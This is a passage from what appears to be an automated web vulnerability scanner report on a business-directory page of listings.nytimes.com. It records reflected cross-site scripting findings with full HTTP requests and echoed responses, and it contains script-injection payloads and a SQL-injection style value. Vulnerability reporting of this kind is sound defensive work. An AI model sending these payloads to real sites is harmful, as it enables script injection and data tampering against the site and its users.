AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-5651304dc70<script>alert(1)</script>4e1eaa7805e&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:42:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-5651304dc70<script>alert(1)</script>4e1eaa7805e&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-
...[SNIP]...

4.298. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsM parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsM request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24baa"><script>alert(1)</script>7f913e2e242e7378b was submitted in the sLsIdsM parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-56173124baa"><script>alert(1)</script>7f913e2e242e7378b&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91549
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=FILKNADADHJCAPKMKEGFBAKJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsM" value="125-395953,125-491487,125-444457,125-464308,125-454440,125-454446,125-472602,125-418913,125-422194,125-56173124baa"><script>alert(1)</script>7f913e2e242e7378b">
...[SNIP]...

4.299. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsM parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsM request parameter is copied into the HTML document as plain text between tags. The payload dee83<script>alert(1)</script>eee702b57a1 was submitted in the sLsIdsM parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731dee83<script>alert(1)</script>eee702b57a1&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:43:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731dee83<script>alert(1)</script>eee702b57a1&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-
...[SNIP]...

4.300. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf33"><script>alert(1)</script>9fdac013a2dcfd496 was submitted in the sLsIdsN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-4706936bf33"><script>alert(1)</script>9fdac013a2dcfd496&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91526
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDTSTDT=DKOLPOGAKJMKLNGAKEGJKHJI; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsN" value="125-483424,125-471203,125-430646,125-436208,125-561736,125-394065,125-539553,125-454345,125-463424,125-4706936bf33"><script>alert(1)</script>9fdac013a2dcfd496">
...[SNIP]...

4.301. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsN request parameter is copied into the HTML document as plain text between tags. The payload 5207a<script>alert(1)</script>b4c4050fa6d was submitted in the sLsIdsN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-4706935207a<script>alert(1)</script>b4c4050fa6d&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:43:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-4706935207a<script>alert(1)</script>b4c4050fa6d&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-
...[SNIP]...

4.302. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsO parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsO request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92ff6"><script>alert(1)</script>de58b90eedf804e2c was submitted in the sLsIdsO parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

